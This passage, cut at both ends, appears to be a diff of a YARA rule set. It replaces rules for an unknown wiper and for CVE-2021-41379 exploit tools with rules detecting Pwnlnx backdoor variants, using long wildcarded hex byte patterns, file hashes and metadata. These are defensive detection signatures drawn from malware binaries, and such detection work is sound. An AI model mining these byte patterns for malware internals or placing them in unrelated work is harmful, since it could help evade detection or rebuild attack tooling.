8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090554889??534883????80????????????75??BB????????488B??????????4881??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??B8????????4885??74??BF????????E8????????C6????????????4883????5BC9C30F1F????????????55B8????????4885??4889??74??BE????????BF????????E8????????4883????????????74??B8????????4885??74??BF????????C9FF??0F1F??????????C9C39090554889??534881??????????89??????????48C7????????????8B????3D????????0F87????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????BA????????488D??????????4889??4889??E8????????4889????4883??????0F84????????488D??????????488D??????????4889??4889??E8????????85??0F85????????488B??????????4889????C7????????????488B????89????488B????48C1????89????488B????4889????488B????4889??????488B????4889??????E8????????89????BE????????488D????E8????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????BE????????488D????E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??0F85????????8B????89??4889??48C1????8B????89??488D????4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7E??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??74??8B????48984801????488B????483B????7C??EB??90EB??90EB??90EB??90EB??90EB??90488B????4889??E8????????EB??90EB??90EB??90B8????????4881??????????5BC9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????0F84????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????488B????4889????488B????4889??????488B????4889??????E8????????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??0F84????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??0F84????????488D????8B????BA????????4889??89??E8????????85??74??488D????BE????????4889??E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??75??8B????83????75??8B????488B????4889????488B????4889??????488B????4889??????89??E8????????EB??90EB??90EB??90EB??90EB??908B????89??E8????????B8????????4881??????????5BC9C390554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????89??C1????F7????89??48980FB6??????????89??31??488B????88??83??????4883??????8B????3B????7C??488B????C9C3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????C9C39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????BA????????488D??????????488D??????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????0F84????????488D??????????488B????4889??4889??E8????????488D??????????488D????B9????????BA????????4889??4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????488D??????????4989??BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????488B??????????8B??????????4189??4181??????????8B??????????89??81??????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????4889??????4889??????488B????4889??????488B????4889????4589??4189??4889??BE????????4889?? }
 
 	condition:
-		filesize > 40KB and 8 of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
 }
-rule ARKBIRD_SOLG_WIP_Unk_Wiper_July_2021_1 : FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_3 : BACKDOOR FILE
 {
 	meta:
-		description = "Detect unknown wiper that focuses olympic games in Japan"
-		author = "Arkbird_SOLG"
-		id = "a03d558e-399a-506e-8f37-d4907cc68d54"
-		date = "2021-07-22"
-		modified = "2021-07-22"
-		reference = "https://www.mbsd.jp/research/20210721/blog/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-22/WIP_Unk_Wiper_July_2021_1.yara#L1-L29"
-		license_url = "N/A"
-		logic_hash = "32f66fee2547ef33121620b822f86bfdf66ff337909a56aa4f0e8ef83b6d7730"
+		description = "Rule to detect the backdoor pwnlnx variant"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "02ea1eb2-7235-5ed5-86ba-19d52e8fb428"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L67-L97"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "08f29e234f0ce3bded1771d702f8b5963b144141727e48b8a0594f58317aac75"
+		logic_hash = "8a1405f430ce57810577f65ef43a1425601bf49b5adb4f6f935505427ad9dc94"
 		score = 75
-		quality = 40
-		tags = "FILE"
-		hash1 = "295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f"
-		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
-		tlp = "green"
-		adversary = "Olympic Destroyer ?"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = "\\\\.\\Global\\ProcmonDebugLogger" fullword ascii
-		$s2 = { 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 00 00 00 00 4f 6c 6c 79 44 62 67 }
-		$s3 = { 8d 44 24 10 50 ff 15 08 30 40 00 50 ff 15 2c 30 40 00 83 7c 24 10 00 0f 85 76 02 00 00 33 c9 0f 1f }
-		$s4 = { 50 68 00 12 40 00 ff 15 60 30 40 00 85 c0 0f 85 ef 02 00 00 50 68 80 00 00 00 6a 03 50 6a 07 68 00 00 00 80 68 0c 32 40 00 ff 15 18 30 40 00 83 }
-		$s5 = { 8b 3d d0 30 40 00 88 84 0c e8 00 00 00 8d 84 24 e8 00 00 00 50 ff d7 83 c4 04 b0 9a 33 c9 0f 1f 00 f6 d0 88 84 0c b4 00 00 00 41 8a 81 30 32 40 }
-		$s6 = { 8b ec 83 ec 14 83 65 f4 00 8d 45 f4 83 65 f8 00 50 ff 15 34 30 40 00 8b 45 f8 33 45 f4 89 45 fc ff 15 38 30 40 00 31 45 fc ff 15 3c 30 40 00 31 45 fc 8d 45 ec 50 ff 15 40 30 40 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 }
-		$p1 = { 5c 2e 5c 47 6c 6f 62 61 6c 5c 35 84 44 65 62 75 67 4c 6f 67 67 3f }
-		$p2 = "UPX" fullword ascii
-		$p3 = { 45 6e 75 6d 57 69 6e 64 6f 77 73 }
-		$p4 = { 73 65 74 5f 6e 65 77 5f 6d 6f 64 65 00 00 00 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 }
-		$p5 = { 4e 75 74 6f 72 75 6e 2f 43 4e 65 74 }
-		$p6 = { 44 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 }
-		$p7 = { 53 6d 61 72 74 53 6e 69 66 66 67 }
-		$p8 = { 26 30 30 63 66 67 }
-		$p9 = { 72 6f 63 65 94 48 61 63 6b }
+		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????000000000000B0??3A??000000000000000040??????????????????????01??000005????????0000000000000000??????0000000000004000000000????????????0000????????????00000000????00000000????0000????0000????A40C??00000000C0??????????????C0??????????????5013??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????000000000000????000000000000??????000000000000070000??????0000C0??????????????C0??????????????C0??????????????28??00000000000078??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000??????000000000000C0????????????????????????0000????84????00000000C8??????0000000025????????0000????374200000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000??????4200000000????A56C00000000????????????0000????24??00000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000????83??????0000????A56C00000000????????????0000????5E42000000000000A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????914200000000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000??????4200000000??????EC08??4301??????62??0000E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090B8????????55482D????????4883????4889??76??B8????????4885??74??5DBF????????FF??660F1F????????????5DC366666666????????????????????BE????????554881??????????48C1????4889??4889??48C1????4801??48D1??74??B8????????4885??74??5DBF????????FF??0F1F??5DC3660F1F??????80????????????75??554889??53BB????????4881??????????4883????488B??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??E8????????B8????????4885??74??BF????????E8????????C6????????????4883????5B5DF3??669055B8????????4885??4889??74??BE????????BF????????E8????????BF????????4883????75??5DE9????????6690B8????????4885??74??FF??EB??9090554889??534881??????????89??????????48C7????????????8B????3D????????76??E9????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????BE????????4889??E8????????4889????4883??????75??E9????????488D??????????488D??????????4889??4889??E8????????85??74??E9????????488B??????????4889????C7????????????488B????89????488B????48C1????89????4883????FF????FF????FF????E8????????4883????89????BE????????488D????E8????????8B??????????BA????????488D????89??E8????????85??75??E9????????8B??????????BA????????488D????89??E8????????85??75??E9????????BE????????488D????E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??E9????????8B????89??48C1????4889??8B????89??4801??4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7F??EB??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??75??EB??8B????48984801????488B????483B????7C??488B????4889??E8????????B8????????488B????C9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????75??E9????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????4883????FF????FF????FF????E8????????4883????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??75??E9????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??75??EB??488D????8B????BA????????4889??89??E8????????85??75??EB??488D????BE????????4889??E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??EB??8B????83????74??EB??8B????4883????FF????FF????FF????89??E8????????4883????908B????89??E8????????B8????????488B????C9C3554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????99F7????89??48980FB6??????????31??89??488B????88??83??????4883??????8B????3B????7C??488B????5DC3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????5DC39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????488D??????????488D??????????4889??BA????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????75??E9????????488D??????????488B????4889??4889??E8????????488D????488D??????????B9????????BA????????4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????488D??????????488D??????????4989??4889??BA????????BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????4989??488B??????????8B??????????25????????89??8B??????????25????????89??488B????8B????4863??48C1????4801??488B??488D????488D??????????415052FF????FF????4189??4189??BA????????BE????????4889??B8????????E8????????4883????488B????4889??E8????????4889??488D?????????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and ( 5 of ( $s* ) or 7 of ( $p* ) )
+		uint16( 0 ) == 0x457f and filesize < 4000KB and all of them
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_1 : CVE_2021_41379 FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_4 : BACKDOOR FILE
 {
 	meta:
-		description = "Detect exploit tool using CVE-2021-41379"
-		author = "Arkbird_SOLG"
-		id = "616e697d-0c62-58bb-9f37-29670a09d886"
-		date = "2021-11-26"
-		modified = "2021-11-29"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1463414554004709384"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_1.yara#L1-L21"
-		license_url = "N/A"
-		logic_hash = "5514ab8f95a5d82453407dd506d55eaf1a0aa22f5ce6a5fb18501ef41645305a"
+		description = "Rule to detect the backdoor pwnlnx variant 4"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "199bb534-f0f6-5b67-aedd-3eada5e45cc6"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L99-L129"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "2590ab56d46ff344f2aa4998efd1db216850bdddfc146d5d37e4b7d07c7336fc"
+		logic_hash = "11203beee446aaf0783d3a8d3839a88ef16c27d52be8670d650ebf6a1de2c3aa"
 		score = 75
-		quality = 75
-		tags = "CVE-2021-41379, FILE"
-		hash1 = "5d97d3035b2ec1bd16016922899350693cae5f7a3be6cadbe0da34fbfd14b612"
-		hash2 = "76fe99189fa84e28dd346b1105da77c4dfd3f7f16478b05bfca4c13a75d9fd07"
-		hash3 = "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd"
-		hash4 = "a018545b334dc2a0e0c437789a339c608852fa1cedcc88be9713806b0855faea"
-		tlp = "white"
-		adversary = "-"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 50 6a 01 50 68 03 00 08 00 68 [3] 00 ff 15 [3] 00 8b f0 83 fe ff 0f 84 [2] 00 00 6a 00 56 ff 15 88 [2] 00 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 56 ff 15 [3] 00 8b 3d [3] 00 56 ff d7 ff 15 [3] 00 50 6a 00 68 00 10 10 00 ff 15 [3] 00 8b f0 c7 85 ?? fb ff ff 00 00 00 00 8d 85 ?? fb ff ff 50 68 ff 01 0f 00 56 ff 15 [3] 00 56 ff d7 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 6a 04 8d 85 ?? fb ff ff 50 6a 0c ff b5 ?? fb ff ff ff 15 08 [2] 00 6a 44 8d 85 78 fb ff ff 0f 57 c0 6a 00 50 0f 11 85 bc fb ff ff e8 [2] 00 00 83 c4 0c c7 85 78 fb ff ff 44 00 00 00 b8 05 00 00 00 c7 85 80 fb ff ff [3] 00 66 89 85 a8 fb ff ff 8d 85 e8 fd ff ff 68 04 01 00 00 50 68 [3] 00 ff 15 [3] 00 8d 85 bc fb ff ff 50 8d 85 78 fb ff ff 50 6a 00 6a 00 6a 10 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 ff b5 bc fb ff ff ff d7 ff b5 c0 fb ff ff ff d7 }
-		$s2 = { 6a 00 68 80 00 00 04 6a 04 6a 00 6a 01 68 00 00 01 80 8d 85 e8 fd ff ff 50 ff 15 [3] 00 8b 35 [3] 00 a3 [3] 00 8d 85 d8 fb ff ff 50 6a 00 6a 00 68 [2] 40 00 6a 00 6a 00 c7 85 d8 fb ff ff 00 00 00 00 ff d6 8b f8 8b 85 dc fb ff ff 68 [3] 00 05 0c 02 00 00 68 04 01 00 00 50 }
-		$s3 = { 55 8b ec 81 ec 04 08 00 00 a1 04 [2] 00 33 c5 89 45 fc 0f 10 05 [3] 00 ?? 8b ?? 08 8d 85 2c f8 ff ff [0-1] 0f 11 85 fc f7 ff ff [1-5] 0f 10 05 [3] 00 [3-8] 0f 11 85 0c f8 ff ff [0-1] 0f 10 05 }
-		$s4 = { 50 ff ?? 68 04 01 00 00 8d 85 e0 fb ff ff 50 6a 00 ff 15 [3] 00 50 ff 15 [3] 00 6a 00 e8 [2] ff ff 50 8d 85 e0 fb ff ff 50 ff 15 84 [2] 00 6a 00 ff 15 [3] 00 8d 85 ?? fb ff ff 50 68 [3] 00 6a 04 6a 00 68 [3] 00 ff 15 [3] 00 ff 15 [3] 00 8b 35 [3] 00 8b 3d [3] 00 }
+		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000????????????000000000000??????0000000040??????????????000014??000003??0000474E55????9FECFBE5??F973??EB??2A??????????71??BD????????0000000000000000554889??53E8????????FF????????????4889??4889??4881??????????FF????????????4889??5BC9C30F1F??????554889??E8????????FF????????????C9C366666666????????????????????554889??E8????????4885??74??4C8B????4D85??74??65??8B????????????8B??????????4889??????????48C7??????????89??C1????C1????01??25????????29??48984C89????????????FF??????????C9C3660F1F????????????31??C9C36666662E????????????????554889??E8????????4889??????????48C7??????????FF??????????C9C390554889??E8????????8B??????????488B??????????488D????0FB6????3C??400F94??3C??410F94??74??4084??75??B8????????C9C30F1F????????????8B??????????39????74??3B????74??4584??74??8B??????????4801??0FB7??????????66????74??66??????75??4889??41FF??B8????????C9C30F1F??4084??74??8B??????????4801??0FB7??????????66????75??EB??0F1F????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??BE????????E8????????483D????????77??4885??74??488B????4889????31??4889??E8????????31??4883????5BC9C383????EB??660F1F??????554889??415453E8????????4989??4889??BE????????31??E8????????483D????????77??488B????31??4889??488B????4989????488B????4889????E8????????31??5B415CC9C383????EB??554889??4157415641554154534883????E8????????4889??488D????4989??4189??4889??BA????????4989??4489????4D89??E8????????488B??????????448B????4881??????????488D????75??EB??0F1F????488B????4881??????????488D????74??0FB7????4839??75??4883????31??5B415C415D415E415FC9C30F1F??????4D89??4C89??4489??4889??4C89??FF??????????4883????5B415C415D415E415FC9C30F1F????554889??4157415641554154534883????E8????????65??8B????????????4889????4889????4189??8B??????????4889??B9????????48C7??????????4889??4D89??4589??89??C1????C1????01??25????????29??F3A648984C8B????????????0F84????????B9????????48C7??????????4889??F3A60F84????????31??4585??4889??4889????4489????74??418D??????31??488D??????0FB6??4883????4889??48C1????48C1????4801??4801??4839??488D????488D????75??89????488D????4C89??E8????????4885??4889??0F84????????488B????4885??74??81????????????0F84????????488B??????????483D????????4C8D????75??EB??0F1F??????498B????483D????????4C8D????74??498B??4889??E8????????85??75??31??4883????5B415C415D415E415FC9C34589??4D89??488B????4489??4889??488B????FF??????????4883????5B415C415D415E415FC9C30F1F??????????81????????????0F85????????31??EB??488D????4C89??E8????????4885??4889??74??498B????488B??????????488B????4885??74??31??4889??4889????FF??4885??488B????0F84????????31??E9????????0F1F????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??41554154534883????E8????????4C8B??????????4989??4981??????????498D??????75??EB??0F1F????4C8B????4981??????????498D??????74??488B??4C89??E8????????85??75??4C89??E8????????488B??E8????????4889??E8????????4883????5B415C415DC9C36666662E????????????????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889?? }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 400KB and all of them
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_2 : CVE_2021_41379 FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_6 : BACKDOOR FILE
 {
 	meta:
-		description = "Detect exploit tool using CVE-2021-41379 (variant 2)"
-		author = "Arkbird_SOLG"
-		id = "29fe9a9c-5180-55c8-882b-ad18981dc011"
-		date = "2021-11-26"
-		modified = "2021-11-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_2.yara#L1-L22"
-		license_url = "N/A"
-		logic_hash = "28b1d0d6c0ee14cd46b12763692f4f76020cd5ad74bb2b39b61f493b98486068"
+		description = "Rule to detect the backdoor pwnlnx variant 6"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "56bfe9c7-4cd4-51f6-a469-da8af52d64c2"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L131-L161"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "d29254ab907c9ef54349de3ec0dd8b22b4692c58ed7a7b340afbc6e44363f96a"
+		logic_hash = "29423135a46ee7b9aa1bd8f1e6f7ffad09725787ad6e75312e1d34b18e3917d4"
 		score = 75
-		quality = 75
-		tags = "CVE-2021-41379, FILE"
-		hash1 = "13fe508e7efb50378eb8e0225221283756bf482d51be7837f850ef2b7f3281f0"
-		hash2 = "402722d95d468ddef049e1079c882bb9a316841b9695a15783fc23bbd3b33aed"
-		hash3 = "d025564e6dc872cff32f2295e0b5a2d8e3a21fbef1957facb69a493fa8a995fb"
-		hash4 = "dc65cd6311fd764a89d0761932bef61a89fd979510bd9ff23cde8c001de316b8"
-		tlp = "white"
-		adversary = "-"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 4c 89 6c 24 38 44 89 6c 24 30 44 89 6c 24 28 44 89 6c 24 20 [1-2] 01 00 00 00 ?? 8b ?? 45 33 c0 ba 03 00 08 00 48 8d 0d [3] 00 ff 15 [3] 00 48 8b d8 48 83 f8 ff 0f 84 ?? 01 00 00 33 d2 48 8b c8 ff 15 [3] 00 44 89 6d 10 48 8d 55 10 48 8b cb ff 15 [3] 00 48 8b cb ff 15 [3] 00 ff 15 [3] 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [3] 00 48 8b d8 4c 89 }
-		$s2 = { 4c 89 6c 24 30 c7 44 24 28 80 00 00 04 c7 44 24 20 04 00 00 00 45 33 c9 [1-2] 01 00 00 00 ?? 8b ?? ba 00 00 01 80 48 8d 4d 20 ff 15 [3] 00 48 89 05 [3] 00 44 89 6d 14 48 8d 45 14 48 89 44 24 28 44 89 6c 24 20 45 33 c9 4c 8d 05 [2] ff ff 33 d2 33 c9 ff 15 [3] 00 48 8b d8 ?? 8b ?? ba 04 01 00 00 49 8d ?? 10 02 00 00 [4] 00 }
-		$s3 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 [3] 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 [3] 00 48 8b d9 33 d2 0f 10 0d [3] 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 [3] 00 0f 29 4c 24 30 0f 29 44 24 40 e8 [2] 00 00 4c 8b 0b 48 8d 44 24 20 41 b8 00 04 00 00 41 8b c8 66 83 38 00 74 0a 48 83 c0 02 48 83 e9 01 75 f0 45 33 d2 49 8b c0 48 2b c1 48 85 c9 49 0f 44 c2 74 47 4c 2b c0 48 8d 44 44 20 74 2e b9 fe ff ff 7f 4c 2b c8 0f 1f 80 00 00 00 00 48 85 c9 74 1a 41 0f b7 14 01 66 85 d2 74 10 66 89 10 48 ff c9 48 83 c0 02 49 83 e8 01 75 e1 4d 85 c0 48 8d 50 fe 48 0f 45 d0 66 44 89 12 33 d2 8d 4a 02 ff 15 [3] 00 48 8b 4b 08 48 8d 54 24 20 ff 15 [3] 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 [2] 00 00 48 81 c4 30 08 00 00 5b }
-		$s4 = { 48 8b c8 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8b c8 41 b8 04 01 00 00 48 8d 95 30 02 00 00 ff 15 [3] 00 e8 [2] ff ff 48 8b d0 45 33 c0 48 8d 8d 30 02 00 00 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8d }
+		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000??????09??00000000000000004000000000??????2B??28??04??000014??000003??0000474E55????4D9585????AB6522????52AD3B??EC9B4BE8????????0000000000000000????00000000554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????4